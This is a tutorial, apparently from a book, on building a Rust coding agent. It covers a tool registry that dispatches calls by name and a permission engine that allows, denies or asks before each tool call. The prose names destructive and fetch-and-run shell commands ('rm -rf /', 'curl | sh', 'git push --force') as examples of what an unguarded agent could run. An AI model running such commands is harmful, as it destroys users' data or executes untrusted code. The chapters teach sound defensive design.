With search tools in place, the agent can now explore an unfamiliar codebase on its own. Given a prompt like "find and fix the bug in the parser," it can glob for source files, grep for the parser code, read the relevant files, and then use the write and edit tools from Chapter 9 to make changes. The tool suite is becoming complete.

Check yourself



Chapter 12: Tool Registry

File(s) to edit: src/types.rs (ToolSet)
Test to run: cargo test -p mini-claw-code-starter test_multi_tool_ (integration tests)
Estimated time: 30 min

You have five tools. You have a SimpleAgent. This chapter wires them together.

Goal

  • Build a default_tools() helper that assembles all tools into a single ToolSet so the agent can discover and dispatch them by name.
  • Wire the ToolSet to SimpleAgent so the LLM sees all tool schemas and the agent dispatches calls to the correct tool.
  • Handle unknown tool calls gracefully by returning an error string that lets the LLM recover.
  • Run the full integration test suite proving that real tools execute with real side effects inside the agent loop.

Over the past chapters you built the individual tools that let your agent interact with the world -- file reading and writing (Chapter 9), command execution (Chapter 10), and optionally pattern search (Chapter 11). Each tool implements the Tool trait, has a JSON schema, and returns a String. But they exist in isolation. The agent has no way to discover them, expose their schemas to the LLM, or dispatch calls by name.

The tool registry is the bridge. It holds every available tool in a single ToolSet, exposes their schemas to the LLM so it knows what it can call, and dispatches incoming tool calls to the correct implementation by name. By the end of this chapter, you will have a fully functional coding agent that can read, write, edit, and execute commands -- the complete tool loop, now with real tools instead of test doubles.

cargo test -p mini-claw-code-starter test_multi_tool_

The module layout

All tool implementations live under src/tools/, one file per tool:

src/tools/
  mod.rs       -- re-exports everything
  ask.rs       -- AskTool (bonus)
  bash.rs      -- BashTool
  edit.rs      -- EditTool
  read.rs      -- ReadTool
  write.rs     -- WriteTool

The mod.rs is a flat barrel file:

#![allow(unused)]
fn main() {
mod ask;
mod bash;
mod edit;
mod read;
mod write;

pub use ask::*;
pub use bash::BashTool;
pub use edit::EditTool;
pub use read::ReadTool;
pub use write::WriteTool;
}

Every tool is a separate file with a single public struct. The mod.rs re-exports the structs so downstream code can write use crate::tools::{ReadTool, WriteTool} without reaching into individual modules.

The flat structure is deliberate. There is no tools/file/mod.rs grouping ReadTool, WriteTool, and EditTool together. Why? Because tools are always referenced individually -- you register ReadTool::new(), not FileTools::all(). A flat module keeps the import paths short and the mental model simple. When you have 5 tools this is obviously fine. Claude Code has 40+ tools and still uses a similar flat layout -- each tool is its own module with a single export.


Key Rust concept: trait objects and dynamic dispatch

The ToolSet stores tools as Box<dyn Tool> -- a trait object that erases the concrete type. This means ReadTool, WriteTool, EditTool, and BashTool all become the same type behind a pointer, despite having different implementations. The HashMap<String, Box<dyn Tool>> is the collection that makes this work: it maps tool names to trait objects, so the agent can look up any tool by its string name at runtime.

This is dynamic dispatch. When the agent calls tool.call(args), the compiler does not know at compile time which call() method to invoke. It uses a vtable -- a function pointer table attached to the trait object -- to find the correct implementation at runtime. The cost is one pointer indirection per call, which is negligible compared to the I/O and network operations the tools perform.
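A self-contained sketch of the pattern, with a simplified synchronous trait and stand-in tools (`Echo` and `Upper` are illustrative, not the book's tools):

```rust
use std::collections::HashMap;

// Simplified, synchronous stand-in for the real Tool trait.
trait Tool {
    fn name(&self) -> &'static str;
    fn call(&self, input: &str) -> String;
}

struct Echo;
impl Tool for Echo {
    fn name(&self) -> &'static str { "echo" }
    fn call(&self, input: &str) -> String { input.to_string() }
}

struct Upper;
impl Tool for Upper {
    fn name(&self) -> &'static str { "upper" }
    fn call(&self, input: &str) -> String { input.to_uppercase() }
}

fn main() {
    // Both concrete types are erased to Box<dyn Tool>; call() goes through the vtable.
    let mut tools: HashMap<String, Box<dyn Tool>> = HashMap::new();
    for tool in [Box::new(Echo) as Box<dyn Tool>, Box::new(Upper) as Box<dyn Tool>] {
        tools.insert(tool.name().to_string(), tool);
    }
    assert_eq!(tools.get("upper").map(|t| t.call("hi")), Some("HI".to_string()));
    assert!(tools.get("imaginary").is_none()); // unknown names simply miss the map
}
```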


Building a ToolSet

The ToolSet you defined in Chapter 4 is a HashMap<String, Box<dyn Tool>> with a builder API. Now we use it for real. Here is a helper function that assembles the standard tool set:

#![allow(unused)]
fn main() {
fn default_tools() -> ToolSet {
    ToolSet::new()
        .with(ReadTool::new())
        .with(WriteTool::new())
        .with(EditTool::new())
        .with(BashTool::new())
}
}

Four calls to .with(), one per tool. Each call constructs the tool, extracts its name from the ToolDefinition, and inserts it into the internal HashMap. The builder pattern means the order does not matter -- the tools are keyed by name, not position. (The AskTool requires an InputHandler, so it is registered separately when user input is needed.)

After construction, the ToolSet supports the operations the agent needs:

#![allow(unused)]
fn main() {
let tools = default_tools();

// Look up a tool by name (returns Option<&dyn Tool>)
let read = tools.get("read").unwrap();

// Get all schemas for the LLM
let defs: Vec<&ToolDefinition> = tools.definitions();
}

The definitions() method is what the SimpleAgent calls at the start of each loop iteration to tell the LLM which tools are available. Every definition includes the tool's name, description, and JSON Schema for its parameters. The LLM uses this information to decide when and how to call each tool.

The get() method is what the agent calls during tool dispatch -- the LLM says "name": "read", the agent does tools.get("read"), and calls the returned tool's .call() method with the provided arguments.


Tool categories (extension concept)

Not all tools are created equal. In the starter, the Tool trait is simplified to just definition() and call(). But in a production agent, tools carry metadata that classifies their behavior -- whether they are read-only, concurrent-safe, or destructive. These flags drive the permission engine, plan mode, and concurrent execution decisions.

Here is how the tools would be categorized:

Read-only tools: ReadTool (and GlobTool, GrepTool if added)

These tools observe the filesystem without changing it. Reading a file, listing paths by glob pattern, and searching content with regex -- none of these have side effects. They are safe to run in parallel and safe to run in a read-only plan mode.

Write tools: WriteTool, EditTool

Write and Edit modify files, so they are not read-only. They are not concurrent-safe because two writes to the same file would race. But they are not destructive either -- file writes are recoverable (you can revert with git).

Destructive tools: BashTool

The BashTool is the most dangerous. It can run arbitrary shell commands -- rm -rf /, git push --force, curl | sh. A production agent would mark it as destructive, requiring explicit user approval.

Why these categories matter

In a production agent, categories compose into a permission hierarchy:

Category       Plan mode   Auto-approve   Default mode
Read-only      Allowed     Allowed        Allowed
Write          Denied      Allowed        Ask user
Destructive    Denied      Ask user       Ask user

The starter does not implement these categories yet -- that is an extension topic for later chapters. For now, the SimpleAgent executes every tool call the LLM requests without question.
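If you do build this extension, the matrix is a natural fit for an exhaustive `match`. A hypothetical sketch -- none of these types exist in the starter:

```rust
// Hypothetical category/mode types mirroring the permission matrix above.
#[derive(Clone, Copy)]
enum Category { ReadOnly, Write, Destructive }

#[derive(Clone, Copy)]
enum Mode { Plan, AutoApprove, Default }

#[derive(Debug, PartialEq)]
enum Decision { Allowed, Denied, AskUser }

fn decide(category: Category, mode: Mode) -> Decision {
    match (category, mode) {
        (Category::ReadOnly, _) => Decision::Allowed,
        (Category::Write, Mode::Plan) => Decision::Denied,
        (Category::Write, Mode::AutoApprove) => Decision::Allowed,
        (Category::Write, Mode::Default) => Decision::AskUser,
        (Category::Destructive, Mode::Plan) => Decision::Denied,
        (Category::Destructive, _) => Decision::AskUser,
    }
}

fn main() {
    assert_eq!(decide(Category::ReadOnly, Mode::Plan), Decision::Allowed);
    assert_eq!(decide(Category::Write, Mode::Plan), Decision::Denied);
    assert_eq!(decide(Category::Destructive, Mode::AutoApprove), Decision::AskUser);
}
```

The exhaustive match means the compiler forces you to revisit this function whenever a new category or mode is added.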


Tool dispatch flow

Here is the complete flow from the LLM requesting a tool to the result being sent back:

flowchart TD
    A["LLM responds with<br/>StopReason::ToolUse"] --> B["For each ToolCall"]
    B --> C{"tools.get(name)?"}
    C -->|Some| D["tool.call(args)"]
    C -->|None| E["Return error:<br/>unknown tool"]
    D --> F["Push ToolResult<br/>into message history"]
    E --> F
    F --> G["Call provider.chat()<br/>with updated history"]
    G --> H{"StopReason?"}
    H -->|ToolUse| B
    H -->|Stop| I["Return final text"]

Wiring tools to the SimpleAgent

The SimpleAgent from the earlier chapters accepts tools through its builder API. You can add tools one at a time:

#![allow(unused)]
fn main() {
let agent = SimpleAgent::new(provider)
    .tool(ReadTool::new())
    .tool(WriteTool::new())
    .tool(EditTool::new())
    .tool(BashTool::new());
}

The .tool() method calls self.tools.push(t) internally, which extracts the tool's name from its definition and inserts it into the HashMap.

Once constructed, the agent handles the full dispatch pipeline. When the LLM responds with StopReason::ToolUse and a list of ToolCalls, the agent:

  1. Looks up each tool by name in the ToolSet
  2. Executes the tool with call()
  3. Packages the result as a Message::ToolResult and appends it to the conversation

If the LLM requests a tool that does not exist in the registry, the agent returns "error: unknown tool `foo`". The model sees the error and can adjust.


Integration: write, read, respond

The test_multi_tool_write_and_read_flow test demonstrates a complete three-turn interaction with real tools. Let's trace through it step by step.

The setup creates a temp directory and scripts a MockProvider with three responses:

#![allow(unused)]
fn main() {
let dir = tempfile::tempdir().unwrap();
let path = dir.path().join("test.txt");
let path_str = path.to_str().unwrap().to_string();

let provider = MockProvider::new(VecDeque::from([
    // Turn 1: write a file
    AssistantTurn {
        text: None,
        tool_calls: vec![ToolCall {
            id: "c1".into(),
            name: "write".into(),
            arguments: json!({
                "path": path_str,
                "content": "hello from agent"
            }),
        }],
        stop_reason: StopReason::ToolUse,
        usage: None,
    },
    // Turn 2: read it back
    AssistantTurn {
        text: None,
        tool_calls: vec![ToolCall {
            id: "c2".into(),
            name: "read".into(),
            arguments: json!({ "path": path_str }),
        }],
        stop_reason: StopReason::ToolUse,
        usage: None,
    },
    // Turn 3: final answer
    AssistantTurn {
        text: Some("Done! I wrote and read the file.".into()),
        tool_calls: vec![],
        stop_reason: StopReason::Stop,
        usage: None,
    },
]));
}

The agent is built with only the tools it needs:

#![allow(unused)]
fn main() {
let agent = SimpleAgent::new(provider)
    .tool(ReadTool::new())
    .tool(WriteTool::new());
}

Now trace the loop:

Turn 1 -- Write. The agent calls provider.chat(), gets back StopReason::ToolUse with a write tool call. It looks up "write" in the ToolSet, finds WriteTool, calls it with {"path": "/tmp/.../test.txt", "content": "hello from agent"}. The WriteTool creates the file on disk. The agent pushes the Message::Assistant(turn) and Message::ToolResult into the conversation history.

Message history after turn 1:

[User]         "write and read a file"
[Assistant]    tool_calls: [write(path, content)]
[ToolResult]   "wrote /tmp/.../test.txt"

Turn 2 -- Read. The agent calls provider.chat() again with the updated history. The mock returns a read tool call. The agent looks up "read", calls ReadTool with {"path": "/tmp/.../test.txt"}. The ReadTool reads the file that WriteTool created in the previous turn and returns its content.

Message history after turn 2:

[User]         "write and read a file"
[Assistant]    tool_calls: [write(path, content)]
[ToolResult]   "wrote /tmp/.../test.txt"
[Assistant]    tool_calls: [read(path)]
[ToolResult]   "hello from agent"

Turn 3 -- Final answer. The agent calls provider.chat() one more time. The mock returns StopReason::Stop with text. The agent pushes the final assistant message and returns the text to the caller.

The test verifies two things: the returned text contains "Done!", and the file actually exists on disk with the expected content. This confirms that real tools executed with real side effects inside the agent loop.

#![allow(unused)]
fn main() {
let result = agent.run("write and read a file").await.unwrap();
assert!(result.contains("Done!"));
assert_eq!(
    std::fs::read_to_string(&path).unwrap(),
    "hello from agent"
);
}

Error recovery: the hallucinated tool

The test_simple_agent_unknown_tool test demonstrates what happens when the LLM requests a tool that does not exist. This is not a hypothetical scenario -- models regularly hallucinate tool names, especially smaller models or when the tool list is long.

The mock provider scripts two responses:

#![allow(unused)]
fn main() {
let provider = MockProvider::new(VecDeque::from([
    // LLM hallucinates a tool
    AssistantTurn {
        text: None,
        tool_calls: vec![ToolCall {
            id: "c1".into(),
            name: "imaginary_tool".into(),
            arguments: json!({}),
        }],
        stop_reason: StopReason::ToolUse,
        usage: None,
    },
    // LLM recovers after seeing the error
    AssistantTurn {
        text: Some("Sorry, that tool doesn't exist.".into()),
        tool_calls: vec![],
        stop_reason: StopReason::Stop,
        usage: None,
    },
]));

let agent = SimpleAgent::new(provider).tool(ReadTool::new());
let result = agent.run("do something").await.unwrap();
assert!(result.contains("doesn't exist"));
}

Here is what happens:

Turn 1. The LLM asks to call "imaginary_tool". The agent does tools.get("imaginary_tool"), gets None, and returns "error: unknown tool `imaginary_tool`". This error message is pushed into the conversation as a Message::ToolResult. The loop continues.

Turn 2. The LLM sees the error in the conversation history and produces a text response acknowledging the mistake. The agent returns normally.

The agent did not crash. It did not panic. It did not return an Err. It treated the unknown tool as a recoverable error and let the model recover. This is the correct behavior for a production agent. Models make mistakes. The agent should be resilient to them.

The same pattern handles other failure modes: a tool that returns an execution error or a tool that encounters an I/O failure. In every case, the model sees a descriptive error message and can adjust its approach.


How Claude Code does it

Claude Code's tool registry is substantially larger, but the architecture is the same.

Scale. Claude Code registers 40+ tools spanning file operations, git, browser, notebooks, MCP (Model Context Protocol), and more. Each tool has permission metadata, cost hints, and rich terminal rendering. Our five tools (four core plus AskTool) cover the essential capabilities -- the same protocol, less surface area.

Dynamic registration. Our ToolSet is built at startup and never changes. Claude Code's registry is dynamic -- MCP tools are discovered and registered at runtime when a user configures an MCP server. A tool can appear or disappear mid-session. The ToolSet::push() method you built in Chapter 4 supports this pattern, though we do not exercise it yet.

Tool groups. Claude Code organizes tools into permission groups. File tools, git tools, and shell tools each have group-level allow/deny rules. Our flat ToolSet is simpler -- the permission engine (when implemented) would check per-tool metadata.

Usage statistics. Claude Code tracks how often each tool is called, how long each call takes, and how many tokens each result consumes. This data feeds into the TUI's status display and helps with cost estimation. Our book does not cover usage statistics, though the TokenUsage type from Chapter 4 gives you a starting point at the message level.

Despite these differences, the core protocol is identical. The LLM sees a list of tool schemas. It decides to call one. The agent looks up the tool by name, executes it, and feeds the result back. Everything else -- permissions, groups, statistics, dynamic registration -- is orchestration around that lookup.


Tests

Run the integration tests:

cargo test -p mini-claw-code-starter test_multi_tool_

Key tests:

  • test_multi_tool_write_and_read_flow -- Agent writes a file then reads it back, verifying the file exists on disk with correct content.
  • test_multi_tool_edit_flow -- Agent edits an existing file with string replacement and reads back the result.
  • test_multi_tool_bash_then_report -- Agent runs a shell command and reports the output.
  • test_multi_tool_write_edit_read_flow -- Full pipeline: write initial content, edit it, read it back. Confirms tools chain correctly.
  • test_multi_tool_all_four_tools -- Agent uses bash, write, edit, and read in a single session, exercising the full tool set.
  • test_multi_tool_multiple_writes -- Agent writes two separate files in sequence.
  • test_multi_tool_read_multiple_files -- Agent reads two files in a single turn using parallel tool calls.
  • test_multi_tool_five_step_conversation -- A five-step flow (bash, write, read, edit, read) verifying long multi-tool sessions.
  • test_multi_tool_chat_basic -- Verifies the chat() method for simple text-only responses.
  • test_multi_tool_chat_with_tool_call -- Verifies chat() with tool dispatch and message history growth.
  • test_multi_tool_chat_multi_turn -- Two-turn conversation using chat() with accumulating message history.

Key takeaway

The tool registry is a HashMap lookup: the LLM produces a tool name, the agent finds the matching implementation, and calls it. This indirection -- name-based dispatch through trait objects -- is what lets you add or remove tools without changing the agent loop.


Recap

Part II is complete. Over four chapters you built every tool a basic coding agent needs:

  • ReadTool reads files with line numbers, offsets, and limits.
  • WriteTool creates and overwrites files, creating parent directories as needed.
  • EditTool performs surgical string replacements within existing files.
  • BashTool executes shell commands with timeout support and exit code reporting.
  • GlobTool finds files by pattern matching across the directory tree.
  • GrepTool searches file contents with regex and context lines.

In this chapter you wired them all together through the ToolSet registry and connected them to the SimpleAgent. The agent can now receive a user prompt, send it to the LLM with all tool schemas, execute whatever tools the model requests, and loop until the model produces a final answer. You have a working coding agent.

But a working agent is not a safe agent. Right now, the engine executes every tool call the LLM requests without question. If the model decides to bash("rm -rf /"), the engine runs it. If it writes over your source files with garbage, the engine writes. There are no guardrails, no confirmation prompts, no safety checks. The tool flags (is_read_only, is_destructive) exist but nothing enforces them.


What's next

Part III -- Safety & Control -- adds the guardrails that turn a working agent into a trustworthy one:

  • Chapter 13: Permission Engine -- The system that checks every tool call before execution. It evaluates permission rules, respects the permission mode, and asks the user when needed.
  • Chapter 14: Safety Checks -- Static analysis of tool arguments. Catches dangerous patterns (rm -rf, git push --force) before the permission prompt even appears.
  • Chapter 15: Hook System -- Pre-tool and post-tool hooks that run shell commands around tool execution. Lets users enforce custom policies (run linters after edits, block certain paths).
  • Chapter 16: Plan Mode -- A restricted execution mode where only read-only tools run. The agent can analyze and plan but never modify. This is where is_read_only() finally gets enforced.

The tools you built in Part II are the hands. Part III teaches the agent when to use them -- and when not to.

Check yourself



Chapter 13: Permission Engine

File(s) to edit: src/permissions.rs
Test to run: cargo test -p mini-claw-code-starter permissions
Estimated time: 40 min

Your agent does whatever the LLM tells it to.

Think about that for a moment. In Chapters 1-12 you built a fully functional coding agent with several tools. The LLM can read files, write files, edit files, and execute arbitrary shell commands. The SimpleAgent dutifully dispatches every tool call the model requests. If the model says bash("rm -rf /"), the agent runs it. If it writes garbage over your source files, the agent writes. If it decides to curl | sh something from the internet, the agent curls. There is nothing between the LLM's request and the tool's execution.

This is fine for a tutorial. It is not fine for software you run on your actual codebase.

Chapter 13 changes that. We build the PermissionEngine -- the gatekeeper that evaluates every tool call before it executes. It sits between the SimpleAgent and the tools, and for each call it returns one of three answers: allow it silently, deny it, or ask the user for approval. The decision depends on configured rules, a default permission, and whether the user has already approved this tool during the session.

This is the first chapter of Part III: Safety & Control. By the end of it, your agent will no longer blindly obey the LLM. It will ask permission first.

cargo test -p mini-claw-code-starter permissions

Goal

  • Implement PermissionRule::matches() using glob::Pattern so rules can match tool names with wildcards (e.g., "mcp__*" matches all MCP tools).
  • Build the PermissionEngine with its three-stage evaluation pipeline: session approvals, then ordered rules, then default permission.
  • Provide convenience constructors (ask_by_default, allow_all) for common configurations.
  • Record session approvals so that once a user approves a tool, it stays approved for the rest of the session.

The problem: a spectrum of trust

Not every tool call is equally risky. Reading a file is harmless. Writing a file is recoverable (you can revert with git). Running rm -rf / is catastrophic. A good permission system should treat these differently.

At the same time, not every user wants the same level of control. Some users want to approve every action. Some want to approve only dangerous ones. Some are running automated pipelines and want no prompts at all. And some are in planning mode, where the agent should only observe, never modify.

This gives us two dimensions to work with:

  1. Tool risk level -- How dangerous is this tool?
  2. User trust level -- How much control does the user want? (The permission rules and default permission.)

The permission engine combines both dimensions into a single decision. Rules match tool names using glob patterns, and a default permission applies when no rule matches. This gives users fine-grained control over which tools require approval.


Permission types

The permission system introduces several new types in src/permissions.rs. Let's walk through each one.

Permission: the decision

#![allow(unused)]
fn main() {
#[derive(Debug, Clone, PartialEq)]
pub enum Permission {
    /// Tool call is allowed without asking.
    Allow,
    /// Tool call is blocked without asking.
    Deny,
    /// User must be prompted for approval.
    Ask,
}
}

Three variants, one for each possible outcome. Allow means execute immediately -- no prompt, no delay. Deny means block the call entirely -- the tool never runs. Ask means pause and show the user a prompt.

In the starter, Deny and Ask are unit variants with no string payload. The caller is responsible for providing context to the user or the model when a tool call is denied or needs approval.

PermissionRule: matching tool names

#![allow(unused)]
fn main() {
#[derive(Debug, Clone)]
pub struct PermissionRule {
    /// Glob pattern matching tool names (e.g. "bash", "write", "*").
    pub tool_pattern: String,
    /// The permission to assign when the pattern matches.
    pub permission: Permission,
}
}

Rules let users assign permissions to specific tools. A PermissionRule matches tool names with a glob pattern (using the glob::Pattern crate) and assigns a permission: always allow, always deny, or always ask.

For example, you might add a rule that allows write without prompting -- because you trust the model with file writes in this particular project. Or you might add a rule that denies bash entirely -- because this is a read-heavy analysis task and you want to prevent any command execution.

The matches() method uses glob::Pattern for matching:

#![allow(unused)]
fn main() {
impl PermissionRule {
    pub fn new(tool_pattern: impl Into<String>, permission: Permission) -> Self {
        Self {
            tool_pattern: tool_pattern.into(),
            permission,
        }
    }

    /// Check if this rule matches a tool name.
    /// Uses glob::Pattern for pattern matching, falling back to
    /// exact string comparison if the pattern is invalid.
    pub fn matches(&self, tool_name: &str) -> bool {
        // Your implementation: use glob::Pattern::new(&self.tool_pattern)
        unimplemented!()
    }
}
}

Rules take priority over the default permission. This is the key design principle: specific overrides beat general policies.


The PermissionEngine

With the types defined, we can build the engine itself. Open src/permissions.rs:

#![allow(unused)]
fn main() {
pub struct PermissionEngine {
    rules: Vec<PermissionRule>,
    default_permission: Permission,
    /// Session-level overrides (tool calls the user has already approved).
    session_allows: std::collections::HashSet<String>,
}
}

Three fields:

  • rules -- An ordered list of permission rules. First match wins.
  • default_permission -- The fallback permission when no rule matches. Typically Permission::Ask for interactive use or Permission::Allow for bypass mode.
  • session_allows -- A set of tool names the user has approved during this session.

The constructors provide common configurations:

#![allow(unused)]
fn main() {
impl PermissionEngine {
    pub fn new(rules: Vec<PermissionRule>, default_permission: Permission) -> Self {
        // Your implementation: store rules, default_permission, and empty session_allows HashSet
        unimplemented!()
    }

    /// Create an engine that asks for everything by default.
    pub fn ask_by_default(rules: Vec<PermissionRule>) -> Self {
        Self::new(rules, Permission::Ask)
    }

    /// Create an engine that allows everything (no permission checks).
    pub fn allow_all() -> Self {
        Self::new(vec![], Permission::Allow)
    }
}
}

ask_by_default() is the standard interactive configuration -- every tool that is not covered by a rule prompts the user. allow_all() is the bypass mode -- no rules, no prompts. Session approvals start empty and accumulate as the user interacts with the agent.


The evaluate pipeline

The core of the engine is the evaluate method. It takes a tool name and the tool arguments, and returns a Permission. The pipeline has three stages, evaluated in order. The first stage that produces a definitive answer wins.

flowchart TD
    A["evaluate(tool_name, args)"] --> B{"tool_name in<br/>session_allows?"}
    B -->|Yes| C["Return Allow"]
    B -->|No| D{"Any rule<br/>matches?"}
    D -->|Yes| E["Return rule.permission"]
    D -->|No| F["Return default_permission"]
#![allow(unused)]
fn main() {
pub fn evaluate(&self, tool_name: &str, _args: &Value) -> Permission {
    // Stage 1: session approvals
    if self.session_allows.contains(tool_name) {
        return Permission::Allow;
    }

    // Stage 2: rules in order (first match wins)
    for rule in &self.rules {
        if rule.matches(tool_name) {
            return rule.permission.clone();
        }
    }

    // Stage 3: default
    self.default_permission.clone()
}
}

Let's walk through each stage.

Stage 1: Session approvals

#![allow(unused)]
fn main() {
if self.session_allows.contains(tool_name) {
    return Permission::Allow;
}
}

If the user has already approved this tool during the current session, allow it immediately. Session approvals are recorded when the user says "yes" to an Ask prompt. Once approved, the tool runs without prompting for the rest of the session.

Session approvals are per-tool, not global. Approving write does not approve bash. This is deliberate -- the user should make a conscious choice for each tool they trust.

Stage 2: Permission rules

#![allow(unused)]
fn main() {
for rule in &self.rules {
    if rule.matches(tool_name) {
        return rule.permission.clone();
    }
}
}

If no session approval matched, we check the configured rules. Rules are evaluated in order -- the first rule whose matches() method returns true wins.

This is a critical design choice: first match wins. If you have two rules:

1. bash  -> Deny
2. *     -> Allow

Then bash hits rule 1 and is denied. Everything else hits rule 2 and is allowed. If the order were reversed, rule 2 would match everything first and rule 1 would never fire.

The matches() method uses glob::Pattern for matching, which gives you more expressive patterns than simple string comparison. "bash" matches only "bash". "*" matches everything. "file_*" matches "file_read", "file_write", etc.

Stage 3: Default permission

#![allow(unused)]
fn main() {
self.default_permission.clone()
}

If no session approval matched and no rule matched, fall back to the default permission set at construction time. For ask_by_default(), this is Permission::Ask. For allow_all(), this is Permission::Allow.


Key Rust concept: the glob::Pattern crate

The glob crate provides filesystem-style pattern matching. glob::Pattern::new("mcp__*") compiles a pattern, and .matches("mcp__fs__read") tests a string against it. The key operators are * (match any sequence of characters), ? (match any single character), and [abc] (match any character in the set). Unlike regex, glob patterns are intentionally simple -- they match whole strings, not substrings, and have no backtracking. This makes them fast and easy to reason about for tool name matching.

The Pattern::new() call returns a Result because the pattern string might be syntactically invalid (e.g., an unclosed bracket). The fallback to exact string comparison handles this edge case gracefully.


Pattern matching with glob

The PermissionRule::matches() method uses the glob crate for pattern matching:

#![allow(unused)]
fn main() {
pub fn matches(&self, tool_name: &str) -> bool {
    glob::Pattern::new(&self.tool_pattern)
        .map(|p| p.matches(tool_name))
        .unwrap_or(self.tool_pattern == tool_name)
}
}

Two cases:

  • Valid glob pattern -- glob::Pattern::new() succeeds. The pattern is matched against the tool name using glob semantics: "*" matches everything, "file_*" matches "file_read", "file_write", etc., and "bash" matches only "bash".
  • Invalid glob -- Falls back to exact string comparison. This is a safety net -- in practice, tool name patterns are simple and always valid.

Using glob::Pattern instead of hand-rolled matching gives us full glob semantics -- wildcards (* and ?), character classes ([abc]), and proper whole-string matching -- with no custom code.


Session approvals

When evaluate returns Permission::Ask, the caller (typically the SimpleAgent or UI layer) prompts the user. If the user says yes, the caller records the approval:

#![allow(unused)]
fn main() {
pub fn record_session_allow(&mut self, tool_name: &str) {
    self.session_allows.insert(tool_name.to_string());
}
}

Subsequent calls to evaluate for the same tool will find it in the session_allows set (stage 1) and return Permission::Allow without prompting again.

The engine also provides convenience methods for checking permission outcomes:

#![allow(unused)]
fn main() {
pub fn is_allowed(&self, tool_name: &str, args: &Value) -> bool {
    matches!(self.evaluate(tool_name, args), Permission::Allow)
}

pub fn needs_approval(&self, tool_name: &str, args: &Value) -> bool {
    matches!(self.evaluate(tool_name, args), Permission::Ask)
}
}

Three properties of session approvals are worth emphasizing:

  1. Per-tool, not global. Approving write does not approve bash. Each tool is a separate trust decision.
  2. Session-scoped, not persistent. Approvals live in memory and vanish when the process exits. There is no file, no database, no persistence. If you restart the agent, you start with a clean slate.
  3. Above rules in priority. In the starter, session approvals are checked first (stage 1), so an approval overrides any rule. This is a deliberate simplification -- once the user says yes, the tool is approved for the session regardless of rules.

Putting it all together: a complete trace

Let's trace through a realistic scenario to see how the pipeline works end to end.

A user starts the agent with ask_by_default and one rule: write is always allowed.

#![allow(unused)]
fn main() {
let engine = PermissionEngine::ask_by_default(vec![
    PermissionRule::new("write", Permission::Allow),
]);
}

Now the LLM makes three tool calls in sequence. Here is what happens at each one:

Call 1: read("src/main.rs")

Stage 1: "read" not in session_allows. -> continue
Stage 2: Rule "write" does not match "read". No more rules. -> continue
Stage 3: Default permission is Ask. -> Ask

Result: Ask. The UI prompts the user. (Note: in the starter there are no is_read_only() flags on tools, so read tools go through the same pipeline as any other tool.)

Call 2: write("src/main.rs", ...)

Stage 1: "write" not in session_allows. -> continue
Stage 2: Rule "write" matches "write". Permission: Allow. -> Allow

Result: Allow. The write executes silently -- the rule overrides what the default permission would normally do (ask the user).

Call 3: bash("cargo test")

Stage 1: "bash" not in session_allows. -> continue
Stage 2: Rule "write" does not match "bash". No more rules. -> continue
Stage 3: Default permission is Ask. -> Ask

Result: Ask. The UI prompts the user. If the user approves, the caller calls engine.record_session_allow("bash"), and subsequent bash calls will be allowed via stage 1.


How the engine integrates with the SimpleAgent

The PermissionEngine is designed to be called from inside the SimpleAgent's tool execution flow. The integration point is conceptually simple:

For each tool call from the LLM:
    1. Look up the tool in the ToolSet
    2. Call permission_engine.evaluate(tool_name, args)
    3. Match on the Permission:
       - Allow  -> execute the tool
       - Deny   -> return an error string to the LLM
       - Ask    -> prompt the user, then execute or deny

We will wire this up fully in later chapters. For now, the PermissionEngine is a standalone component with a clean interface: give it a tool name and arguments, get back a decision. This separation makes it testable in isolation -- which is exactly what this chapter's tests do.


How Claude Code does it

Claude Code's permission system follows the same architecture but with more granularity.

Permission modes. Claude Code has the same core modes -- a default interactive mode, an auto-approve mode, and a plan mode. The mode is set via CLI flags (--dangerously-skip-permissions for bypass, --plan for plan mode) or interactively during the session.

Tool groups. Rather than individual tool flags, Claude Code organizes tools into permission groups. File tools, git tools, shell tools, and MCP tools each have group-level policies. A single rule can allow or deny an entire group. Our glob-based tool patterns achieve a similar effect with patterns like "file_*".

Per-path rules. Claude Code's rules can match not just tool names but also tool arguments -- specifically file paths. A rule like "allow write to src/**" permits writes within the source directory but blocks writes elsewhere. Our rules match only on tool names, which is simpler but less precise.

Session approvals. Claude Code's session approval system works the same way -- once the user approves a tool, it stays approved for the session. The approval is per-tool-name, stored in memory, and cleared on session reset.

Layered evaluation. The evaluation pipeline is the same: check session approvals, then match rules, then fall back to defaults. The ordering ensures that specific policies override general ones, just as in our implementation.

The core insight is the same in both systems: the permission engine is a function from (rules, session_state, default_permission) to Permission. It does not execute tools. It does not modify state (except session approvals). It just answers the question: should this tool call proceed?


Tests

Run the permission engine tests:

cargo test -p mini-claw-code-starter permissions

Key tests:

  • test_permissions_allow_all -- allow_all() returns Allow for every tool, confirming bypass mode works.
  • test_permissions_ask_by_default -- ask_by_default() with no rules returns Ask for any tool.
  • test_permissions_rule_matching -- Three explicit rules for read, bash, and write return their respective permissions.
  • test_permissions_glob_pattern -- A glob rule "mcp__*" matches "mcp__fs__read" but not "read".
  • test_permissions_first_rule_wins -- Two rules for "bash" (Allow then Deny); first match wins, so Allow is returned.
  • test_permissions_session_allow -- After record_session_allow("bash"), a tool that previously returned Ask now returns Allow.
  • test_permissions_session_allow_per_tool -- Approving "read" does not approve "write" -- session approvals are per-tool.
  • test_permissions_is_allowed / test_permissions_needs_approval -- Convenience methods correctly reflect the underlying evaluate() result.
  • test_permissions_wildcard_rule -- A "*" rule overrides the default permission for all tools.
  • test_permissions_deny_overrides_default -- A Deny rule for "dangerous" blocks it even when the default is Allow.

Key takeaway

The permission engine is a pure function from (tool_name, rules, session_state, default) to Permission. It does not execute tools or interact with the user -- it just answers the question "should this proceed?" This separation makes it trivially testable and reusable across different UI contexts.


Recap

In this chapter you built the PermissionEngine -- the gatekeeper between the LLM's requests and your tools. The key ideas:

  • Three outcomes -- Allow, Deny, Ask. Every tool call gets one of these before it runs.
  • Ordered pipeline -- Session approvals first, then rules, then default permission. Specific policies beat general ones.
  • Glob-pattern rules -- Rules use glob::Pattern for tool name matching. The first matching rule wins. This gives users fine-grained control over which tools require approval.
  • Session approvals -- Once the user says yes, that tool is approved for the session. Per-tool, in-memory, not persistent.
  • Convenience constructors -- ask_by_default() for interactive use, allow_all() for bypass mode.

The engine is pure logic -- it does not execute tools, and it does not interact with the user. It takes a tool name and arguments, and returns a decision. This separation makes it testable, composable, and easy to reason about.


What's next

The permission engine decides whether a tool call should run based on who the tool is and what mode the user is in. But it does not look at what the tool is being asked to do. A bash tool is bash whether it runs ls or rm -rf /. A write tool is a write tool whether it targets src/main.rs or .env.

